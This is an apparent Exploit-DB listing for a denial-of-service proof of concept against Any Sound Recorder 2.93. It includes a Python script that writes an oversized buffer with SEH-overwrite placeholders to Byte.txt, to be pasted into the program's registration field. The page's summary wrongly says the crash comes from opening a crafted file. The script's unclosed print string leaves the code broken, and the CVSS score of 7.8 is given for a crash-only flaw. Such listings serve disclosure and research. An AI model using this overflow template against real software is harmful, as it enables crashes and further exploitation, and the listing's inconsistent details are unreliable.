Any Sound Recorder 2.93 - Denial of Service (PoC)

vendor:

Any Sound Recorder

by:

T3jv1l

7.8

CVSS

HIGH

Denial of Service

N/A

CWE

Product Name: Any Sound Recorder

Affected Version From: Any Sound Recorder 2.93

Affected Version To: Any Sound Recorder 2.93

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 SP1 x86

2018

Any Sound Recorder 2.93 – Denial of Service (PoC)

Any Sound Recorder 2.93 is vulnerable to a denial of service attack when a maliciously crafted file is opened. An attacker can exploit this vulnerability by creating a file with a large amount of data and then opening it in the application. This will cause the application to crash.

Mitigation:

Users should avoid opening files from untrusted sources.

Source

Exploit-DB raw data:

# Exploit Title: Any Sound Recorder 2.93 - Denial of Service (PoC)
# Date: 2018-09-09
# Exploit Author: T3jv1l
# Vendor Homepage: http://www.any-sound-recorder.com
# Software: http://www.any-sound-recorder.com/anysoundrecorder.exe
# Version: Any Sound Recorder 2.93 
# Tested on: Windows 7 SP1 x86

#!/usr/bin/python 

import struct
print"""

#1.  Download and install the setup file
#2.  A file "Byte.txt" will be created
#3.  Click Help > Enter key code... in tool bar
#4.  Copy the contents of the file (Byte.txt) and paste in the Username Name field 
#5.  Click Register and BOOMMMM !!!! 

totalsize = 7000 # total size buff
buffer= "\x41" * 900  #Offset
nseh= "BBBB" # next seh address 
seh= "CCCC"  # seh address
shellcode= "T" * (totalsize-len(buffer+nseh+seh))
payload = buffer + nseh + seh + shellcode
try:
    f=open("Byte.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"